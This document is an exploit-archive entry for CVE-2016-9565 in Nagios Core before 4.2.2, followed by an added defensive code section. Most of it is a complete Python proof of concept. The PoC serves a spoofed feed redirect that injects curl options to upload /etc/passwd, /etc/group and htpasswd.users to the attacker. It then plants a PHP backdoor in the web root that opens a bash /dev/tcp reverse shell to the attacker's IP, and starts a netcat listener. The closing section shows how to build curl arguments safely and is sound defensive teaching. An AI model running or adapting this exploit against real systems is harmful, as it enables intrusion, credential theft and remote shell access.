Nagios < 4.2.2 - Arbitrary Code Execution

Exploit author: Dawid Golunski
Platform: linux
Release date: 2016-12-15

#!/usr/bin/env python

# Source: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
#
# Python 2 / Tornado 4-era PoC. Indentation normalised to spaces, the optional
# reverse-shell port argument (argv[2]) and the netcat listener port fixed so
# they agree with the usage text, and the root privesc reference corrected to
# CVE-2016-9566 (the companion advisory linked below).

intro = """\033[94m
Nagios Core < 4.2.2 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0

Discovered & Coded by:

Dawid Golunski
https://legalhackers.com
\033[0m
"""
usage = """
This PoC exploit can allow well-positioned attackers to extract and write
arbitrary files on the Nagios server, which can lead to arbitrary code execution
on Nagios deployments that follow the official Nagios installation guidelines.

For details, see the full advisory at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

PoC Video:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

Follow https://twitter.com/dawid_golunski for updates on this advisory.

Remember you can turn the nagios shell into a root shell via CVE-2016-9566:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html

Usage:

./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]

Disclaimer:
For testing purposes only. Do no harm.

"""

import os
import sys
import tornado.httpserver
import tornado.web
import tornado.ioloop

exploited  = 0
docroot_rw = 0


class MainHandler(tornado.web.RequestHandler):

    def get(self):
        # First hit: MagpieRSS (User-Agent "MagpieRSS/...") fetching the feed over
        # plain HTTP after the DNS spoof. Answer with a redirect to an https:// URL
        # that carries extra curl options. The fetcher hands https URLs to curl on
        # an unquoted shell command line, so the spaces in the Location value
        # become separate curl arguments: -F uploads files back to us and
        # --trace-ascii writes the trace into the Nagios web root.
        global exploited
        if exploited == 1:
            self.finish()
        else:
            ua = self.request.headers.get('User-Agent', '')
            if "Magpie" in ua:
                print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
                print '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
                self.redirect('https://' + self.request.host + '/nagioshack -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path, permanent=False)
                exploited = 1

    def post(self):
        # Second hit: curl following the redirect with the injected -F options,
        # so the target's files arrive here as multipart form fields.
        global docroot_rw
        print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip

        # Extract /etc/passwd from the target
        passwd = self.request.files['passwd'][0]['body']
        print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd

        # Extract /usr/local/nagios/etc/htpasswd.users
        htauth = self.request.files['htauth'][0]['body']
        print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth

        # Extract the nagios group line from /etc/group. The official install
        # guide adds the web server user (www-data) to the nagios group, which
        # is what makes the web root writable for the --trace-ascii file.
        group = self.request.files['group'][0]['body']
        nagios_group = ''
        for line in group.splitlines():
            if line.startswith("nagios:"):
                nagios_group = line
                print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
        if "www-data" in nagios_group:
            print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
            docroot_rw = 1

        # Put the backdoor PHP payload in the 'Server' response header so that it gets saved intact via the
        # curl 'trace-ascii' option. The output trace should contain an unwrapped line similar to:
        #
        # == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
        #
        # which does the trick as it won't mess up the payload :)
        # (The hex-offset data lines of a trace are wrapped, which would split the PHP; this
        # "== Info:" line, printed by older curl releases for the Server header, is not.)
        self.add_header('Server', backdoor)

        # Return the XML feed with a payload that will run the backdoor code from nagios-backdoor.php via an <img src=> tag :)
        print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
        self.write(xmldata)

        self.finish()
        tornado.ioloop.IOLoop.current().stop()


if __name__ == "__main__":

    print intro

    # Set attacker's external IP & port to be used by the reverse shell
    if len(sys.argv) < 2:
        print usage
        sys.exit(2)
    attacker_ip = sys.argv[1]
    if len(sys.argv) == 3:
        attacker_port = sys.argv[2]
    else:
        attacker_port = 8080

    # PHP backdoor to be saved on the target Nagios server
    backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
    backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)

    # Feed XML containing the payload that will load the nagios-backdoor.php script
    xmldata = """<?xml version="1.0"?>
    <rss version="2.0">
          <channel>
            <title>Nagios feed with injected JS payload</title>
            <item>
              <title>Item 1</title>
              <description>

                <strong>Feed injected. Here we go </strong> -
                loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;)

                <img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">

              </description>

            </item>

          </channel>
    </rss> """


    # Generate a throwaway self-signed certificate for the HTTPS listener (non-interactive)
    print "[+] Generating SSL certificate for our python HTTPS web server \n"
    os.system("openssl req -nodes -new -x509 -subj '/CN=localhost' -keyout server.key -out server.cert 2>/dev/null")

    print "[+] Starting the web server on ports 80 & 443 \n"
    application = tornado.web.Application([
        (r'/.*', MainHandler)
    ])
    application.listen(80)
    http_server = tornado.httpserver.HTTPServer(
        application,
        ssl_options={
            "certfile": os.path.join("./", "server.cert"),
            "keyfile": os.path.join("./", "server.key"),
        }
    )
    http_server.listen(443)

    print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
    tornado.ioloop.IOLoop.current().start()

    if docroot_rw == 1:
        print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
        print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
        os.system("nc -v -l -p %s" % attacker_port)
        print "\n[+] Shell closed\n"

    print "[+] That's all. Exiting\n"
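The bug the PoC leans on is a redirect target being concatenated into a curl shell command, so the spaces in the Location value turn into -F and --trace-ascii options. The example below is added here and is my code, not the PoC's and not MagpieRSS or Nagios code: it feeds the PoC's own option string through a stand-in for that vulnerable string build (modelled with shlex, nothing is executed) and through a hardened builder that validates the redirect and passes the URL as a single argv element after "--". The host feed.example and the allow-list are assumptions.

```python
"""Added example: argument injection via a redirect Location, and the hardened form.
Stand-in code; not the feed fetcher's own implementation."""
import shlex
from urllib.parse import urlsplit

# Constructed sample: the Location value the PoC redirects the fetcher to
# (host is hypothetical; in the attack it is the spoofed feed host).
LOCATION = (
    "https://feed.example/nagioshack"
    " -Fpasswd=@/etc/passwd -Fgroup=@/etc/group"
    " -Fhtauth=@/usr/local/nagios/etc/htpasswd.users"
    " --trace-ascii /usr/local/nagios/share/nagios-backdoor.php"
)


def vulnerable_argv(url):
    """Vulnerable pattern: 'curl ' + url handed to /bin/sh. shlex.split returns
    the argv the shell would build, which is what curl actually receives."""
    return shlex.split("curl -s " + url)


def smuggled_options(argv):
    """Arguments after the URL: attacker-controlled words curl parses as options."""
    return argv[3:]           # argv[0:3] == ['curl', '-s', <url>]


class UnsafeRedirect(ValueError):
    pass


def hardened_argv(url, allowed_hosts):
    """Validate the redirect target, then pass it as ONE argv element after '--'
    so nothing inside it can become a curl option. Intended for an execve-style
    call (subprocess.run(argv)), never for a shell string."""
    if any(c.isspace() for c in url) or url.startswith("-"):
        raise UnsafeRedirect("whitespace or leading dash in redirect target")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise UnsafeRedirect("scheme %r not allowed" % parts.scheme)
    if parts.hostname not in allowed_hosts:
        raise UnsafeRedirect("host %r not in allow-list" % parts.hostname)
    return ["curl", "-s", "--", url]


def is_safe_redirect(url, allowed_hosts):
    """Boolean wrapper around hardened_argv for use in a redirect-following loop."""
    try:
        hardened_argv(url, allowed_hosts)
        return True
    except UnsafeRedirect:
        return False


if __name__ == "__main__":
    argv = vulnerable_argv(LOCATION)
    print("shell would exec:", argv)
    print("options the attacker smuggled in:", smuggled_options(argv))
    print("hardened builder accepts it:", is_safe_redirect(LOCATION, {"feed.example"}))
    print(hardened_argv("https://feed.example/feed.xml", {"feed.example"}))
```

Two points the hardened builder makes explicit: an argv list stops the splitting on spaces, but a redirect target of the form "-o..." would still be read by curl as an option, hence the "--"; and the check has to run on every hop of a redirect chain, because the injected value here arrives on the second request, not the first. Fetching the feed with an HTTP library that verifies certificates, rather than shelling out to curl at all, removes the problem class entirely.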